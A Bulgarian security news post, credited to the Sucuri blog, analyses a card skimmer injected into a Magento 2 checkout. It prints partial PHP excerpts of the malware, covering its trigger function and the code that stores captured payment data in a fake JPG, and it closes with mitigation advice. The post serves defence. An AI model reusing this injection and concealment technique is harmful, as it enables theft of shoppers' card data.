22 юли 2021
Някои ползватели на Интернет често използват креативни техники за прикриване на злонамерено поведение и събиране на чувствителна информация от уебсайтове за електронна търговия.
Неотдавнашно разследване за компрометиран уебсайт Magento 2 разкри злонамерена инжекция, която улавяше данните на POST заявката от посетителите на сайта. Намира се на страницата за плащане и е открито, че кодира уловените данни, преди да ги запази във файл .JPG.
Злонамерено поведение при инжектиране
Следният PHP код беше намерен, инжектиран във файла ./vendor/magento/module-customer/Model/Session.php. За да заредите останалата част от зловредния код в компрометирана среда, функцията getAuthenticates се създава и извиква.
...
public function getAuthenticates($request)
{
if(empty($request->getPostValue('Custom'.'Method')))
return $this;
$docroot = BP . "/";
$sid = $request->getPostValue('Custom'.'Method');
if($sid != 'init' && $sid != 'LnByg' && $sid != 'LnByd') return $this;
Кодът също така създава файла с изображение (pub / media / tmp / design / file / default_luma_logo.jpg), който използва за съхраняване на всички уловени данни. Тази функция позволява на нападателя лесно да осъществи достъп и да изтегли открадната информация, когато им е удобно, като я прикрива в привидно доброкачествен JPG.
$docroot = BP . "/";
$sid = $request->getPostValue('Custom'.'Method');
if($sid != 'init' && $sid != 'LnByg' && $sid != 'LnByd') return $this;
$fname = $docroot.'pub/media/tmp/design/file/default_luma_logo.jpg';
try {
if(!file_exists($fname)){
$fhandle = fopen($fname,'w');fclose($fhandle);
}
$fhandle = fopen($fname,'r');$content = @fread($fhandle,filesize($fname));fclose($fhandle);
...
Заключения и стъпки за смекчаване на възможните негативни последици
"Лошите момчета" винаги активно търсят нови методи, за да предотвратят откриването на тяхното злонамерено поведение на компрометирани уебсайтове. Творческото използване на фалшивия .JPG позволява на атакуващия да прикрие и съхрани събраните данни за кредитна карта за бъдеща употреба, без да предизвика съмнение у собственика на уебсайта.
Собствениците на уебсайтове, които прилагат услуги за мониторинг на уебсайтове или проверки за контрол на целостта, ще имат много по-сериозна възможност за откриване на промени или допълнителни нови файлове в тяхната среда.
РОНА СОФТ препоръчва на ползвателите на Magento да надградят системата си до най-новата версия и да приложат следните инструменти за проверка и мониторинг.
Източник: SUCURI Blog